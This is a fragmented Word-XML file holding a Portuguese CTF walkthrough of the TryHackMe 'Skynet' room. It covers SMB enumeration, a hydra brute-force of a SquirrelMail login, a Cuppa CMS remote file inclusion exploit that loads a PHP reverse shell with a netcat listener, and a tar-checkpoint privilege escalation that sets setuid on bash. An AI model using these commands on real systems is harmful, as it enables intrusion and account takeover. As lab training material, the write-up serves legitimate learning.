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EF65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FBCC211" w14:textId="77777777"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F79900" wp14:editId="3DB55F5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DFF1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6D34EB40" w14:textId="77777777"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231FA20" w14:textId="77777777"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Skynet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2556B79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 w14:paraId="3CE905F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208F69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 w14:paraId="2AC7C18D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5296283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591F097" w14:textId="77777777"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Skynet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D20060" w14:paraId="20102EEC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C58F8E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C51254A" w14:textId="5BDAEA25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D20060" w14:paraId="3E3642BD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27E4DF90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2616A43" w14:textId="2253ADD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None</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D20060" w14:paraId="54FAFA97" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42AB218E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A3316B5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80A73">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://tryhackme.com/r/room/skynet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B6C4EB8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 w14:paraId="08D140FC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="358"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4514B6D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6B759AE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2F8408E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 w14:paraId="28328829" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EB6BC45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6180CB" w14:textId="397F8DD8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E96BF37" w14:textId="118D50E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D20060" w14:paraId="53572207" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="426"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="359E450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CA862B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89DFAF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0C13E22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 w14:paraId="70F60B19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2079852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 w14:paraId="0E0A411E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A14A76F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5680FC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432704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 w14:paraId="1F9A79E6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="408"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A70CFE6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4E486A5" w14:textId="0FE1127B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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="5664" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E0E247C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 w14:paraId="129D8ABF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="428"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04431FA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E22453A" w14:textId="72F1F47A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3C689B4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 w14:paraId="3F05E572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40E07862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E772DE0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3D27E841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  <w:tr w:rsidR="00EF69EC" w14:paraId="05C8637E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3E73EB04" w14:textId="739D7CBC" w:rsidR="00EF69EC" w:rsidRDefault="00EF69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000BDE23" w14:textId="49FE5D07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6255847C" w14:textId="4F8CA7E2" w:rsidR="00EF69EC" w:rsidRDefault="00EF69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2° Revisão </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60402C77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18F6BA3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C524916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0BCAB5ED" w14:textId="77777777"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Content>
        <w:p w14:paraId="7AB1EBE8" w14:textId="77777777"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6B426EF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84657D9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5DA4DC13" w14:textId="36034823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What is the hidden directory?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6</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="189BA03E" w14:textId="2E538A00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6A1456">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?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7</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="255F2E1C" w14:textId="0B09FFFC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What is the user flag:?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8"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8</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4F78BBDE" w14:textId="5D312750"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877C7">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>What is the root flag?</w:t>
          </w:r>
          <w:r w:rsidRPr="003877C7">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidR="00EF69EC">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>9</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65CC095D" w14:textId="15A7A7A6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5F902D31" w14:textId="578C29CF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3922AD08" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0254EBE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EEA577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F29DDE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431B7F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6B2D2F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4B1559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2D62D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234A13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81900FD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247AD1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2C9557A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0E113A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5BB713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2F22CE2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FB0A9E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772C78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95E54C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2E60C2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E6C720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15E81A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1A0D616" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00D200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41CB7C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D469B7A" w14:textId="7FA015DF" w:rsidR="0029230B" w:rsidRDefault="002923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9230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Este CTF oferece uma experiência prática e desafiadora, explorando desde a fase de reconhecimento de uma rede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29230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onde informações cruciais sobre serviços, portas abertas e sistemas são descobertas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0029230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> até a escalada de privilégios para se obter controle total sobre as máquinas. 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F98F0C6" w14:textId="77777777" w:rsidR="0029230B" w:rsidRDefault="002923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64B41A6" w14:textId="68C7446D" w:rsidR="00D20060" w:rsidRPr="003877C7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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003877C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70225BDD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emails?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B0FF7" w14:textId="48590854"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Sempre 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 w:rsidR="0029230B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já é possível notar que há 6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14:paraId="1C10591D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3A37740B" w14:textId="77777777"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16FA8C" wp14:editId="7696AF50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0E9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</w:p>
    <w:p w14:paraId="4808FF75" w14:textId="77777777"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2 formas de descobrir os clientes do samba, você pode tentar qualquer uma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D0C3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>: enum4linux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D0B46B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smbmap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–H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64A5C4E8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D083FB" wp14:editId="1363E7AA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E90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41C595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Há 2 que é possível analisar, mas o foco agora é </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no ”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”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9CFCC2" w14:textId="77777777" w:rsidR="00C539C9" w:rsidRPr="003877C7" w:rsidRDefault="00C539C9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smbclient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 /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/&lt;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&gt;/anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27996C41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BB1010" wp14:editId="75643590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EB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A4E3913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Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>download .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65F06C8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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380AD6B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67C9FA" wp14:editId="48BC4E9E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00F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6199BF4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os arquivos baixados, o primeiro a ser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analizado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será o “log1.txt”.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há uma pequena quantidade de supostas senhas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C4A6E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outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>write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, já foi possível determinar isso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D041EB" w14:textId="77777777"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20D238" wp14:editId="352DB1D8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B0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77978D11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isso é possível. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BC5FB" w14:textId="77777777" w:rsidR="00C80A73" w:rsidRPr="003877C7" w:rsidRDefault="00C80A73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gobuster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-w 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/share/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dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003877C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/wordlists/common.txt -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u  http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>://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&lt;ip_target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6EAF3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0C7CEB" wp14:editId="3B2107D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208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0837CA03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análise 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foi possível acessar o “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>squirrelmail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>”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nosso alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D850B" w14:textId="77777777"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73725" wp14:editId="4A4B776F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A6D" w14:textId="77777777"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>, o</w:t>
      </w:r>
      <w:r w:rsid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E2A5E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0E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vai ser </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizado  e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> também a resposta da primeira pergunta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C962DC" w14:textId="77777777" w:rsidR="00C80A73" w:rsidRPr="003877C7" w:rsidRDefault="000E2A5E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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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usado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003877C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mile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sdyson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 xml:space="preserve"> -P log1.txt &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip_target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;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http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003877C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1:Unknown</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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user or password incorrect."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E274E8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31B3DE" wp14:editId="29CE1D9F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9BC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</w:p>
    <w:p w14:paraId="613596A3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2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2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hidden directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0E72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acesso ao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 olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>client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Miles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521060EA" w14:textId="77777777"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3532BA9" wp14:editId="08BED681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F1E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B09122" w14:textId="77777777"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senha estava correta, agora só dar uma olhada </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no arquivos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 no diretório “notes”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC9A06" w14:textId="77777777"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C37B9C1" wp14:editId="20DDDF02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6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092CE3" w14:textId="77777777"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14:paraId="420C0191" w14:textId="77777777"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importante.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4F050" w14:textId="77777777"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AC1048C" wp14:editId="59D8713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8B3" w14:textId="77777777"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14:paraId="27BA0344" w14:textId="77777777"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7CE6BB" wp14:editId="55AC8F44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FF0" w14:textId="77777777" w:rsidR="0005766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tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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vulnerability called when you can include a remote file for malicious purposes?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1D9C2190" w14:textId="77777777"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Remote File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09C04DB5" w14:textId="77777777"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14:paraId="3171DBAB" w14:textId="77777777"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800FCCB" wp14:editId="38EED076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76" w14:textId="77777777"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3ABAC" w14:textId="77777777"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,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pórem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agora com o novo diretório. Achando o </w:t>
      </w:r>
      <w:proofErr w:type="gram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“ /</w:t>
      </w:r>
      <w:proofErr w:type="gram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administrator”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDDA98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-w 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usr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share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dirb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wordlists</w:t>
      </w:r>
      <w:proofErr w:type="spell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/common.txt -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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  http</w:t>
      </w:r>
      <w:proofErr w:type="gram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14:paraId="49B7F5D3" w14:textId="77777777"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CC01B1B" wp14:editId="30DCA54A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C31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0CF23CB" w14:textId="77777777"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que a página está executando o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CuppaCM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. Então utilizar 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procurar alguma falha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CDADD" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRPr="00150B1D" w:rsidRDefault="00150B1D" w:rsidP="00150B1D"/>
    <w:p w14:paraId="1D85525D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B579DA" w14:textId="77777777"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BBDD07E" wp14:editId="5BF4259F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F49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6244B1D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Então apenas falta escolher o único acessível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baixa-lo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096257FA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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CD5CD64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php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webapps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/25971.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51353850" w14:textId="77777777"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0543947" wp14:editId="7A261D9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BE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3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7A534BFB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896D199" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRPr="003877C7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CF3BD42" w14:textId="77777777"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Lendo um pouco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, você pode ver como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utiliza-lo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14:paraId="2DB095A6" w14:textId="77777777"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baixada e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edita-la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4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14:paraId="6A69C0C4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baixar a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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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esta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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a reverse </w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761519A2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Também é necessário criar um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netcat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ouvir quando a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for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executada .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14:paraId="2285546A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/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=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14:paraId="70042405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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6D8E3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nc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lvnp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port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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B6D15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34986DE" wp14:editId="56C7ACDE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B2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3F9FA8" wp14:editId="34DCD629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E2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710AC7A" wp14:editId="75B58608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8C4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1EE68E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Com uma simples navegação de diretório, é possível achar a primeira flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F96C5" w14:textId="77777777"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E3C635" wp14:editId="7037CF45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D2" w14:textId="77777777"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B6DAC81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497F9DE4" w14:textId="77777777"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>milesdyson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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backup.sh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14:paraId="3FD9032D" w14:textId="77777777"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www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html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14:paraId="035BBCE7" w14:textId="77777777"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proofErr w:type="gram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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gram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\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nchmod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+s /bin/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action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exec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14:paraId="716A9E71" w14:textId="77777777"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Entre no diretório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miles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novamente e execute o comando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ter acesso root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D3B8E" w14:textId="77777777"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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F27CA6" w14:textId="77777777"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</w:p>
    <w:p w14:paraId="7CA49968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817791D" wp14:editId="278E0881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852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914D5" wp14:editId="1ED0EC4C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046" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00D20060">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBCD924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76E32081" w14:textId="6E6FC6DD"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</w:t>
      </w:r>
      <w:r w:rsidR="0029230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impossível.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262DA52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55E2D2B" w14:textId="77777777"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2"/>
      <w:footerReference w:type="default" r:id="rId3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4792A" w14:textId="77777777" w:rsidR="000B6881" w:rsidRDefault="000B6881">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3AA4A147" w14:textId="77777777" w:rsidR="000B6881" w:rsidRDefault="000B6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18F88" w14:textId="77777777"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B88098" w14:textId="77777777" w:rsidR="000B6881" w:rsidRDefault="000B6881">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0E0B971B" w14:textId="77777777" w:rsidR="000B6881" w:rsidRDefault="000B6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A496B" w14:textId="77777777"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55DE41A" wp14:editId="2E04A066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28A32B7" wp14:editId="0AC838CD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BF5402" w14:textId="77777777"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060"/>
    <w:rsid w:val="00057666"/>
    <w:rsid w:val="000B6881"/>
    <w:rsid w:val="000E2A5E"/>
    <w:rsid w:val="00150B1D"/>
    <w:rsid w:val="001B1B77"/>
    <w:rsid w:val="00213468"/>
    <w:rsid w:val="0029230B"/>
    <w:rsid w:val="003877C7"/>
    <w:rsid w:val="003938D9"/>
    <w:rsid w:val="00611DAF"/>
    <w:rsid w:val="00625C40"/>
    <w:rsid w:val="006636FF"/>
    <w:rsid w:val="006A1456"/>
    <w:rsid w:val="006C795F"/>
    <w:rsid w:val="006E68C0"/>
    <w:rsid w:val="006F73AC"/>
    <w:rsid w:val="00703669"/>
    <w:rsid w:val="007338C6"/>
    <w:rsid w:val="00745D95"/>
    <w:rsid w:val="00780A57"/>
    <w:rsid w:val="007B4878"/>
    <w:rsid w:val="007D4C84"/>
    <w:rsid w:val="00963711"/>
    <w:rsid w:val="00AC45F8"/>
    <w:rsid w:val="00B1782E"/>
    <w:rsid w:val="00B60B06"/>
    <w:rsid w:val="00BF5AC8"/>
    <w:rsid w:val="00C539C9"/>
    <w:rsid w:val="00C80A73"/>
    <w:rsid w:val="00D20060"/>
    <w:rsid w:val="00D46938"/>
    <w:rsid w:val="00DC433B"/>
    <w:rsid w:val="00DD1392"/>
    <w:rsid w:val="00E505AC"/>
    <w:rsid w:val="00E95723"/>
    <w:rsid w:val="00EF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DD44"/>
  <w15:docId w15:val="{0B79EEBD-5D33-49C1-B5A7-B236623E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entestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackme.com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entestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackm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11</Pages>
  <Words>918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EIKE GONCALVES BARBOSA</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-18T09:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-09T16:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>